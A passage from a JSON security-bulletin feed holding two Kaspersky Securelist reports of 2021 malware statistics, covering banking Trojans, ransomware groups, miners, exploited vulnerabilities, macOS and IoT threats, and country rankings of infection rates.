HEUR:Trojan-Downloader.Shell.Agent.bc | 2.72% \n5 | Backdoor.Linux.Mirai.a | 2.72% \n6 | Backdoor.Linux.Mirai.ba | 2.67% \n7 | Backdoor.Linux.Agent.bc | 2.37% \n8 | Trojan-Downloader.Shell.Agent.p | 1.37% \n9 | Backdoor.Linux.Gafgyt.bj | 0.78% \n10 | Trojan-Downloader.Linux.Mirai.d | 0.66% \n \n_* Share of malware type in the total number of malicious programs downloaded to IoT devices following a successful attack._\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Cybercriminals create such sites on purpose; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries that are sources of web-based attacks: Top 10\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn Q1 2021, Kaspersky solutions blocked 2,023,556,082 attacks launched from online resources located across the globe. 613,968,631 unique URLs were recognized as malicious by Web Anti-Virus.\n\n_Distribution of web attack sources by country, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111405/13-en-malware-report-q1-2021-pc.png>))_\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious objects that fall under the **Malware class**; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Belarus | 15.81 \n2 | Ukraine | 13.60 \n3 | Moldova | 13.16 \n4 | Kyrgyzstan | 11.78 \n5 | Latvia | 11.38 \n6 | Algeria | 11.16 \n7 | Russia | 11.11 \n8 | Mauritania | 11.08 \n9 | Kazakhstan | 10.62 \n10 | Tajikistan | 10.60 \n11 | Uzbekistan | 10.39 \n12 | Estonia | 10.20 \n13 | Armenia | 9.44 \n14 | Mongolia | 9.36 \n15 | France | 9.35 \n16 | Greece | 9.04 \n17 | Azerbaijan | 8.57 \n18 | Madagascar | 8.56 \n19 | Morocco | 8.55 \n20 | Lithuania | 8.53 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000). \n** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky products in the country._\n\n_These statistics are based on detection verdicts by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data._\n\nOn average, 7.67% of Internet user computers worldwide experienced at least one **Malware-class** attack.\n\n_Geography of web-based malware attacks, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111435/14-en-malware-report-q1-2021-pc.png>))_\n\n## Local threats\n\n_In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. It takes into account malicious programs that were found directly on users' computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\nIn Q1 2021, our File Anti-Virus detected **77,415,192** malicious and potentially unwanted objects.\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nNote that this rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Afghanistan | 47.71 \n2 | Turkmenistan | 43.39 \n3 | Ethiopia | 41.03 \n4 | Tajikistan | 38.96 \n5 | Bangladesh | 36.21 \n6 | Algeria | 35.49 \n7 | Myanmar | 35.16 \n8 | Uzbekistan | 34.95 \n9 | South Sudan | 34.17 \n10 | Benin | 34.08 \n11 | China | 33.34 \n12 | Iraq | 33.14 \n13 | Laos | 32.84 \n14 | Burkina Faso | 32.61 \n15 | Mali | 32.42 \n16 | Guinea | 32.40 \n17 | Yemen | 32.32 \n18 | Mauritania | 32.22 \n19 | Burundi | 31.68 \n20 | Sudan | 31.61 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._\n\n_Geography of local infection attempts, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111505/15-en-malware-report-q1-2021-pc.png>))_\n\nOverall, 15.05% of user computers globally faced at least one **Malware-class** local threat during Q1.", "cvss3": {}, "published": "2021-05-31T10:00:05", "type": "securelist", "title": "IT threat evolution Q1 2021. Non-mobile statistics", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2015-2523", "CVE-2017-11882", "CVE-2018-0802", "CVE-2021-1647", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-21139", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21972", "CVE-2021-24074", "CVE-2021-24086", "CVE-2021-24092", "CVE-2021-24094", "CVE-2021-25274", "CVE-2021-25275", "CVE-2021-25276", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-05-31T10:00:05", "id": "SECURELIST:20C7BC6E3C43CD3D939A2E3EAE01D4C1", "href": "https://securelist.com/it-threat-evolution-q1-2021-non-mobile-statistics/102425/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-26T12:37:38", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/26093821/abstract_digits_cell-990x400.jpg)\n\n * [IT threat evolution Q3 2021](<https://securelist.com/it-threat-evolution-q3-2021/104876/>)\n * **IT threat evolution in Q3 2021. PC statistics**\n * [IT threat evolution in Q3 2021. Mobile statistics](<https://securelist.com/it-threat-evolution-in-q3-2021-mobile-statistics/105020/>)\n\n_These statistics are based on detection verdicts of Kaspersky products received from users who consented to providing statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network, in Q3 2021:\n\n * Kaspersky solutions blocked 1,098,968,315 attacks from online resources across the globe.\n * Web Anti-Virus recognized 289,196,912 unique URLs as malicious.\n * Attempts to run malware for stealing money from online bank accounts were stopped on the computers of 104,257 unique users.\n * Ransomware attacks were defeated on the computers of 108,323 unique users.\n * Our File Anti-Virus detected 62,577,326 unique malicious and potentially unwanted objects.\n\n## Financial threats\n\n### Financial threat statistics\n\nIn Q3 2021, Kaspersky solutions blocked the launch of at least one piece of banking malware on the computers of 104,257 unique users.\n\n_Number of unique users attacked by financial malware, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23150303/01-en-malware-report-q3-2021-pc-graphs.png>))_\n\n**Geography of financial malware attacks**\n\n_To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products who faced this threat during the reporting period as a percentage of all users of our products in that country._\n\n_Geography of financial malware attacks, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23150355/02-en-malware-report-q3-2021-pc-graphs.png>))_\n\n**Top 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Turkmenistan | 5.4 \n2 | Tajikistan | 3.7 \n3 | Afghanistan | 3.5 \n4 | Uzbekistan | 3.0 \n5 | Yemen | 1.9 \n6 | Kazakhstan | 1.6 \n7 | Paraguay | 1.6 \n8 | Sudan | 1.6 \n9 | Zimbabwe | 1.4 \n10 | Belarus | 1.1 \n \n_* Excluded are countries with relatively few Kaspersky product users (under 10,000)._ \n_** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country._\n\n**Top 10 banking malware families**\n\n| Name | Verdicts | %* \n---|---|---|--- \n1 | Zbot | Trojan.Win32.Zbot | 17.7 \n2 | SpyEye | Trojan-Spy.Win32.SpyEye | 17.5 \n3 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 9.6 \n4 | Trickster | Trojan.Win32.Trickster | 4.5 \n5 | RTM | Trojan-Banker.Win32.RTM | 3.6 \n6 | Nimnul | Virus.Win32.Nimnul | 3.0 \n7 | Gozi | Trojan-Banker.Win32.Gozi | 2.7 \n8 | Danabot | Trojan-Banker.Win32.Danabot | 2.4 \n9 | Tinba | Trojan-Banker.Win32.Tinba | 1.5 \n10 | Cridex | Backdoor.Win32.Cridex | 1.3 \n \n_* Unique users who encountered this malware family as a percentage of all users attacked by financial malware._\n\nIn Q3, the family ZeuS/Zbot (17.7%), as usual, became the most widespread family of bankers. Next came the SpyEye (17.5%) family, whose share doubled from 8.8% in the previous quarter. The Top 3 was rounded out by the CliptoShuffler family (9.6%) \u2014 one position and just 0.3 p.p. down. The families Trojan-Banker.Win32.Gozi (2.7%) and Trojan-Banker.Win32.Tinba (1.5%) have made it back into the Top 10 in Q3 \u2014 seventh and ninth places, respectively.\n\n## Ransomware programs\n\n### Quarterly trends and highlights\n\n#### Attack on Kaseya and the REvil story\n\nIn early July, the group REvil/Sodinokibi [attempted an attack](<https://securelist.com/revil-ransomware-attack-on-msp-companies/103075/>) on the remote administration software Kaseya VSA, compromising several managed services providers (MSP) who used this system. Thanks to this onslaught on the supply chain, the attackers were able to infect over one thousand of the compromised MSPs' client businesses. REvil's original $70 million ransom demand in exchange for decryption of all the users hit by the attack was soon moderated to 50 million.\n\nFollowing this massive attack, law enforcement agencies stepped up their attention to REvil, so by mid-July the gang turned off their Trojan infrastructure, suspended new infections and dropped out of sight. Meanwhile, Kaseya got a universal decryptor for all those affected by the attack. [According to](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689-Important-Notice-August-4th-2021>) Kaseya, it "did not pay a ransom \u2014 either directly or indirectly through a third party". Later [it emerged](<https://www.washingtonpost.com/national-security/ransomware-fbi-revil-decryption-key/2021/09/21/4a9417d0-f15f-11eb-a452-4da5fe48582d_story.html>) that the company got the decryptor and the key from the FBI.\n\nBut already in the first half of September, REvil was up and running again. [According to](<https://www.bleepingcomputer.com/news/security/revil-ransomware-is-back-in-full-attack-mode-and-leaking-data/>) the hacking forum XSS, the group's former public representative known as UNKN "disappeared", and the malware developers, failing to find him, waited awhile and restored the Trojan infrastructure from backups.\n\n#### The arrival of BlackMatter: DarkSide restored?\n\nAs we already wrote in our Q2 report, the group DarkSide folded its operations after their "too high-profile" attack on Colonial Pipeline. And now there is a "new" arrival known as BlackMatter, which, as its members [claim](<https://therecord.media/an-interview-with-blackmatter-a-new-ransomware-group-thats-learning-from-the-mistakes-of-darkside-and-revil>), represents the "best" of DarkSide, REvil and LockBit.\n\nFrom our analysis of the BlackMatter Trojan's executable we conclude that most likely it was built using DarkSide's source codes.\n\n#### Q3 closures\n\n * Europol and the Ukrainian police have [arrested](<https://www.europol.europa.eu/newsroom/news/ransomware-gang-arrested-in-ukraine-europol's-support>) two members of an unnamed ransomware gang. The only detail made known is that the ransom demands amounted to \u20ac5 to \u20ac70 million.\n * Following its attack on Washington DC's Metropolitan Police Department, the group Babuk folded (or just suspended) its operations and published an archive containing the Trojan's source code, build tools and keys for some of the victims.\n * At the end of August, Ragnarok (not to be confused with RagnarLocker) suddenly called it a day, deleted all their victims' info from their portal and published the master key for decryption. The group gave no reasons for this course of action.\n\n#### Exploitation of vulnerabilities and new attack methods\n\n * The group HelloKitty used to distribute its ransomware by exploiting the vulnerability CVE-2019-7481 in SonicWall gateways.\n * Magniber and Vice Society penetrated the target systems by exploiting the vulnerabilities from the PrintNightmare family (CVE-2021-1675, CVE-2021-34527, CVE-2021-36958).\n * The group LockFile exploited ProxyShell vulnerabilities (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) to penetrate the victim's network; for lateral expansion they relied on the new PetitPotam attack that gained control of the domain controller.\n * The group Conti also used ProxyShell exploits for its attacks.\n\n### Number of new ransomware modifications\n\nIn Q3 2021, we detected 11 new ransomware families and 2,486 new modifications of this malware type.\n\n_Number of new ransomware modifications, Q3 2020 \u2014 Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23150433/03-en-ru-es-malware-report-q3-2021-pc-graphs.png>))_\n\n## Number of users attacked by ransomware Trojans\n\nIn Q3 2021, Kaspersky products and technologies protected 108,323 users from ransomware attacks.\n\n_Number of unique users attacked by ransomware Trojans, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23150459/04-en-malware-report-q3-2021-pc-graphs.png>))_\n\n## Geography of ransomware attacks\n\n_Geography of attacks by ransomware Trojans, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23150535/05-en-malware-report-q3-2021-pc-graphs.png>))_\n\n**Top 10 countries attacked by ransomware Trojans**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Bangladesh | 1.98 \n2 | Uzbekistan | 0.59 \n3 | Bolivia | 0.55 \n4 | Pakistan | 0.52 \n5 | Myanmar | 0.51 \n6 | China | 0.51 \n7 | Mozambique | 0.51 \n8 | Nepal | 0.48 \n9 | Indonesia | 0.47 \n10 | Egypt | 0.45 \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000). \n** Unique users attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country._\n\n## Top 10 most common families of ransomware Trojans\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | Stop/Djvu | Trojan-Ransom.Win32.Stop | 27.67% \n2 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 17.37% \n3 | WannaCry | Trojan-Ransom.Win32.Wanna | 11.84% \n4 | (generic verdict) | Trojan-Ransom.Win32.Gen | 7.78% \n5 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 5.58% \n6 | (generic verdict) | Trojan-Ransom.Win32.Phny | 5.57% \n7 | PolyRansom/VirLock | Virus.Win32.Polyransom / Trojan-Ransom.Win32.PolyRansom | 2.65% \n8 | (generic verdict) | Trojan-Ransom.Win32.Agent | 2.04% \n9 | (generic verdict) | Trojan-Ransom.MSIL.Encoder | 1.07% \n10 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 1.04% \n \n_* Unique Kaspersky users attacked by this family of ransomware Trojans as a percentage of all users attacked by such malware._\n\n## Miners\n\n### Number of new miner modifications\n\nIn Q3 2021, Kaspersky solutions detected 46,097 new modifications of miners.\n\n_Number of new miner modifications, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23150605/06-en-malware-report-q3-2021-pc-graphs.png>))_\n\n### Number of users attacked by miners\n\nIn Q3, we detected attacks using miners on the computers of 322,131 unique users of Kaspersky products worldwide. And while during Q2 the number of attacked users gradually decreased, the trend was reversed in July and August 2021. With slightly over 140,000 unique users attacked by miners in July, the number of potential victims almost reached 150,000 in September.\n\n_Number of unique users attacked by miners, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23150635/07-en-malware-report-q3-2021-pc-graphs.png>))_\n\n### Geography of miner attacks\n\n_Geography of miner attacks, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23150710/08-en-malware-report-q3-2021-pc-graphs.png>))_\n\n**Top 10 countries attacked by miners**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Ethiopia | 2.41 \n2 | Rwanda | 2.26 \n3 | Myanmar | 2.22 \n4 | Uzbekistan | 1.61 \n5 | Ecuador | 1.47 \n6 | Pakistan | 1.43 \n7 | Tanzania | 1.40 \n8 | Mozambique | 1.34 \n9 | Kazakhstan | 1.34 \n10 | Azerbaijan | 1.27 \n \n_* Excluded are countries with relatively few users of Kaspersky products (under 50,000). \n** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by cybercriminals during cyberattacks\n\n### Quarter highlights\n\nMuch clamor was caused in Q3 by a whole new family of vulnerabilities in Microsoft Windows printing subsystem, one already known to the media as PrintNightmare: [CVE-2021-1640](<https://nvd.nist.gov/vuln/detail/CVE-2021-1640>), [CVE-2021-26878](<https://nvd.nist.gov/vuln/detail/CVE-2021-26878>), [CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>), [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>), [CVE-2021-36936](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36936>), [CVE-2021-36947](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36947>), [CVE-2021-34483](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34483>). All those vulnerabilities allow for local escalation of privileges or remote execution of commands with system rights and, as they require next to nothing for exploitation, they are often used by popular mass infection tools. To fix them, several Microsoft patches are required.\n\nThe vulnerability known as PetitPotam proved no less troublesome. It allows an unprivileged user to take control of a Windows domain computer \u2014 or even a domain controller \u2014 provided the Active Directory certificate service is present and active.\n\nIn the newest OS Windows 11, even before its official release, the vulnerability [CVE-2021-36934](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34483>) was detected and dubbed HiveNightmare/SeriousSam. It allows an unprivileged user to copy all the registry threads, including SAM, through the shadow copy mechanism, potentially exposing passwords and other critical data.\n\nIn Q3, attackers greatly favored exploits targeting the vulnerabilities ProxyToken, ProxyShell and ProxyOracle ([CVE-2021-31207](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207>), [CVE-2021-34473](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>), [CVE-2021-31207](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207>), [CVE-2021-33766](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33766>), [CVE-2021-31195](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31195>), [CVE-2021-31196](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31196>)). If exploited in combination, these open full control of mail servers managed by Microsoft Exchange Server. We already covered [similar vulnerabilities](<https://securelist.com/zero-day-vulnerabilities-in-microsoft-exchange-server/101096/>) \u2014 for instance, they were used in a HAFNIUM attack, also targeting Microsoft Exchange Server.\n\nAs before, server attacks relying on brute-forcing of passwords to various network services, such as MS SQL, RDP, etc., stand out among Q3 2021 network threats. Attacks using the exploits EternalBlue, EternalRomance and similar are as popular as ever. Among the new ones is the grim vulnerability enabling remote code execution when processing the Object-Graph Navigation Language in the product Atlassian Confluence Server ([CVE-2021-26084](<https://jira.atlassian.com/browse/CONFSERVER-67940>)) often used in various corporate environments. Also, Pulse Connect Secure was found to contain the vulnerability [CVE-2021-22937](<https://nvd.nist.gov/vuln/detail/CVE-2021-22937>), which however requires the administrator password for it to be exploited.\n\n### Statistics\n\nAs before, exploits for Microsoft Office vulnerabilities are still leading the pack in Q3 2021 (60,68%). These are popular due to the large body of users, most of whom still use older versions of the software, thus making the attackers' job much easier. The share of Microsoft Office exploits increased by almost 5 p.p. from the previous quarter. Among other things, it was due to the fact that the new vulnerability [CVE-2021-40444](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40444>) was discovered in the wild, instantly employed to compromise user machines. The attacker can exploit it by using the standard functionality that allows office documents to download templates, implemented with the help of special ActiveX components. There is no proper validation of the processed data during the operation, so any malicious code can be downloaded. As you are reading this, the relevant security update is already available.\n\nThe way individual Microsoft Office vulnerabilities are ranked by the number of detections does not change much with time: the first positions are still shared by [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>) and [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>), with another popular vulnerability [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>) not far behind. We already covered these many times \u2014 all the above-mentioned vulnerabilities execute commands on behalf of the user and infect the system.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23151038/09-en-malware-report-q3-2021-pc-graphs.png>))_\n\nThe share of exploits for the popular browsers fell by 3 p.p. from the previous reporting period to 25.57% in Q3. In the three months covered by the report several vulnerabilities were discovered in Google Chrome browser and its script engine V8 \u2014 some of them in the wild. Among these, the following JavaScript engine vulnerabilities stand out: [CVE-2021-30563](<https://chromereleases.googleblog.com/2021/07/stable-channel-update-for-desktop.html>) (type confusion error corrupting the heap memory), [CVE-2021-30632](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop.html>) (out-of-bounds write in V8) and [CVE-2021-30633](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop.html>) (use-after-free in Indexed DB). All these can potentially allow remote execution of code. But it should be remembered that for modern browsers a chain of several exploits is often required to leave the sandbox and secure broader privileges in the system. It should also be noted that with Google Chromium codebase (in particular the Blink component and V8) being used in many browsers, any newly detected Google Chrome vulnerability automatically makes other browsers built with its open codebase vulnerable.\n\nThe third place if held by Google Android vulnerabilities (5.36%) \u2014 1 p.p. down from the previous period. They are followed by exploits for Adobe Flash (3.41%), their share gradually decreasing. The platform is no longer supported but is still favored by users, which is reflected in our statistics.\n\nOur ranking is rounded out by vulnerabilities for Java (2.98%), its share also noticeably lower, and Adobe PDF (1.98%).\n\n## Attacks on macOS\n\nWe will remember Q3 2021 for the two interesting revelations. The first one is the use of [malware code targeting macOS](<https://securelist.com/wildpressure-targets-macos/103072/>) as part of the WildPressure campaign. The second is the detailed [review of the previously unknown FinSpy implants](<https://securelist.com/finspy-unseen-findings/104322/>) for macOS.\n\nSpeaking of the most widespread threats detected by Kaspersky security solutions for macOS, most of our Top 20 ranking positions are occupied by various adware apps. Among the noteworthy ones is Monitor.OSX.HistGrabber.b (second place on the list) \u2014 this potentially unwanted software sends user browser history to its owners' servers.\n\n**Top 20 threats for macOS**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | AdWare.OSX.Pirrit.j | 13.22 \n2 | Monitor.OSX.HistGrabber.b | 11.19 \n3 | AdWare.OSX.Pirrit.ac | 10.31 \n4 | AdWare.OSX.Pirrit.o | 9.32 \n5 | AdWare.OSX.Bnodlero.at | 7.43 \n6 | Trojan-Downloader.OSX.Shlayer.a | 7.22 \n7 | AdWare.OSX.Pirrit.gen | 6.41 \n8 | AdWare.OSX.Cimpli.m | 6.29 \n9 | AdWare.OSX.Bnodlero.bg | 6.13 \n10 | AdWare.OSX.Pirrit.ae | 5.96 \n11 | AdWare.OSX.Agent.gen | 5.65 \n12 | AdWare.OSX.Pirrit.aa | 5.39 \n13 | Trojan-Downloader.OSX.Agent.h | 4.49 \n14 | AdWare.OSX.Bnodlero.ay | 4.18 \n15 | AdWare.OSX.Ketin.gen | 3.56 \n16 | AdWare.OSX.Ketin.h | 3.46 \n17 | Backdoor.OSX.Agent.z | 3.45 \n18 | Trojan-Downloader.OSX.Lador.a | 3.06 \n19 | AdWare.OSX.Bnodlero.t | 2.80 \n20 | AdWare.OSX.Bnodlero.ax | 2.64 \n \n_* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked._\n\n### Geography of threats for macOS\n\n_Geography of threats for macOS, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23151108/10-en-malware-report-q3-2021-pc-graphs.png>))_\n\n**Top 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | France | 3.05 \n2 | Spain | 2.85 \n3 | India | 2.70 \n4 | Mexico | 2.59 \n5 | Canada | 2.52 \n6 | Italy | 2.42 \n7 | United States | 2.37 \n8 | Australia | 2.23 \n9 | Brazil | 2.21 \n10 | United Kingdom | 2.12 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000). \n** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nIn Q3 2021, France took the lead having the greatest percentage of attacks on users of Kaspersky security solutions (3.05%), with the potentially unwanted software Monitor.OSX.HistGrabber being the prevalent threat there. Spain and India came in second and third, with the Pirrit family adware as their prevalent threat.\n\n## IoT attacks\n\n### IoT threat statistics\n\nIn Q3 2021, most of the devices that attacked Kaspersky honeypots did so using the Telnet protocol. Just less than a quarter of all devices attempted brute-forcing our traps via SSH.\n\nTelnet | 76.55% \n---|--- \nSSH | 23.45% \n \n_Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q3 2021_\n\nThe statistics for working sessions with Kaspersky honeypots show similar Telnet dominance.\n\nTelnet | 84.29% \n---|--- \nSSH | 15.71% \n \n_Distribution of cybercriminal working sessions with Kaspersky traps, Q3 2021_\n\n**Top 10 threats delivered to IoT devices via Telnet**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 39.48 \n2 | Trojan-Downloader.Linux.NyaDrop.b | 20.67 \n3 | Backdoor.Linux.Agent.bc | 10.00 \n4 | Backdoor.Linux.Mirai.ba | 8.65 \n5 | Trojan-Downloader.Shell.Agent.p | 3.50 \n6 | Backdoor.Linux.Gafgyt.a | 2.52 \n7 | RiskTool.Linux.BitCoinMiner.b | 1.69 \n8 | Backdoor.Linux.Ssh.a | 1.23 \n9 | Backdoor.Linux.Mirai.ad | 1.20 \n10 | HackTool.Linux.Sshbru.s | 1.12 \n \n_* Share of each threat delivered to infected devices as a result of a successful Telnet attack out of the total number of delivered threats._\n\nDetailed IoT threat statistics are published in our Q3 2021 DDoS report: <https://securelist.com/ddos-attacks-in-q3-2021/104796/#attacks-on-iot-honeypots>\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Cybercriminals create such sites on purpose and web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries that serve as sources of web-based attacks: Top 10\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites hosting malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographic source of web attacks, the GeoIP technique was used to match the domain name to the real IP address at which the domain is hosted._\n\nIn Q3 2021, Kaspersky solutions blocked 1,098,968,315 attacks launched from online resources located across the globe. Web Anti-Virus recognized 289,196,912 unique URLs as malicious.\n\n_Distribution of web-attack sources by country, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23151328/13-en-malware-report-q3-2021-pc-graphs-1.png>))_\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| **Country*** | **% of attacked users**** \n---|---|--- \n1 | Tunisia | 27.15 \n2 | Syria | 17.19 \n3 | Yemen | 17.05 \n4 | Nepal | 15.27 \n5 | Algeria | 15.27 \n6 | Macao | 14.83 \n7 | Belarus | 14.50 \n8 | Moldova | 13.91 \n9 | Madagascar | 13.80 \n10 | Serbia | 13.48 \n11 | Libya | 13.13 \n12 | Mauritania | 13.06 \n13 | Mongolia | 13.06 \n14 | India | 12.89 \n15 | Palestine | 12.79 \n16 | Sri Lanka | 12.76 \n17 | Ukraine | 12.39 \n18 | Estonia | 11.61 \n19 | Tajikistan | 11.44 \n20 | Qatar | 11.14 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000). \n** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky products in the country._\n\n_These statistics are based on detection verdicts by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data._\n\nOn average during the quarter, 8.72% of computers of Internet users worldwide were subjected to at least one **Malware-class** web attack.\n\n_Geography of web-based malware attacks, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23151358/14-en-malware-report-q3-2021-pc-graphs.png>))_\n\n## Local threats\n\n_In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. It takes into account malicious programs that were found directly on users' computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\nIn Q3 2021, our File Anti-Virus detected **62,577,326** malicious and potentially unwanted objects.\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nNote that this rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| **Country*** | **% of attacked users**** \n---|---|--- \n1 | Turkmenistan | 47.42 \n2 | Yemen | 44.27 \n3 | Ethiopia | 42.57 \n4 | Tajikistan | 42.51 \n5 | Uzbekistan | 40.41 \n6 | South Sudan | 40.15 \n7 | Afghanistan | 40.07 \n8 | Cuba | 38.20 \n9 | Bangladesh | 36.49 \n10 | Myanmar | 35.96 \n11 | Venezuela | 35.20 \n12 | China | 35.16 \n13 | Syria | 34.64 \n14 | Madagascar | 33.49 \n15 | Rwanda | 33.06 \n16 | Sudan | 33.01 \n17 | Benin | 32.68 \n18 | Burundi | 31.88 \n19 | Laos | 31.70 \n20 | Cameroon | 31.28 \n \n_* Excluded are countries with relatively few Kaspersky 